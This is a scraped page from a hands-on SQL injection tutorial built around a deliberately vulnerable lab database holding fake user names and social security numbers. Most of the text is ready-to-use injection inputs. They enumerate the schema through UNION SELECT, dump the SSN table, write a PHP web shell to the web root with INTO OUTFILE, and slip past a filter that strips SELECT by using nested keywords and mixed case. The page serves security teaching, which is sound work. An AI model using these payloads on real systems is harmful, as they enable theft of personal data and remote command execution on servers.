Hands-On SQL Injection Tutorial #2

1. Reset the Database Before Using It

2. SQL Database Structure The database named sqlol contains the two tables shown below. Table: users Field: username Field: isadmin Herp Derper 1 SlapdeBack LovedeFace 1 Wengdack Slobdegoob 0 Chunk MacRunfast 0 Peter Weiner 0      Table: ssn Field: name Field: ssn Herp Derper 111-11-1111 SlapdeBack LovedeFace 222-22-2222 Wengdack Slobdegoob 333-33-3333 Chunk MacRunfast 444-44-4444 Peter Weiner 555-55-5555 Important Terms Database -- an object that contains Tables Table -- an object that contains Fields Field -- an item of data, such as a name or ssn

3. Blocking Apostrophe This form deletes apostrophes from the name before using it in a SQL query. However, the numerical field is exploitable. Try the inputs below in this form to see how it works. Name:   IsAdmin (0 or 1):       Performs This Query: SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try Find User Name Herp Derper Isadmin       1 Detect Filtering Name Herp 'Derper Isadmin       1 Detect Vulnerability Name Herp Derper Isadmin       2-1 Test for 1 Column Returned Name Herp Derper Isadmin       1 UNION SELECT Null # Test for 2 Columns Returned Name Herp Derper Isadmin       1 UNION SELECT Null, Null # Find Database Names Name Herp Derper Isadmin 1 UNION SELECT Null,table_schema FROM information_schema.tables # Find Tables in sqlol Database Name Herp Derper Isadmin 1 UNION SELECT Null, table_name FROM information_schema.tables WHERE table_schema='sqlol' # Find Columns within ssn Table Name Herp Derper Isadmin 1 UNION SELECT Null, column_name FROM information_schema.columns WHERE table_name='ssn' AND table_schema='sqlol' # Dump Names and SSNs Name Herp Derper Isadmin 1 UNION SELECT Null, concat(name, ':', ssn) FROM sqlol.ssn # Upload a PHP Shell Name Herp Derper Isadmin 1 UNION SELECT Null, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell17.php' #

4. Blocking SELECT This form uses this code to remove SELECT: $qname = str_replace("SELECT", "", $qname); $qisadmin = str_replace("SELECT", "", $qisadmin); Try the inputs below in this form to see how it works. Name:   IsAdmin (0 or 1):       Performs This Query: SELECT username FROM users WHERE username LIKE 'name AND isadmin = IsAdmin'

Values to Try Find User Name Herp Derper Isadmin       1 Detect Filtering Name HerpSELECT Derper" Isadmin       1SELECT Detect Vulnerability Name Herp Derper Isadmin       2-1 Test for 2 Columns Returned: FAILS Name Herp Derper Isadmin       1 UNION SELECT Null, Null # Test for 2 Columns Returned: SUCCEEDS Name Herp Derper Isadmin       1 UNION SELSELECTECT Null, Null # Test for 2 Columns Returned: SUCCEEDS Name Herp Derper Isadmin       1 UNION sElEcT Null, Null #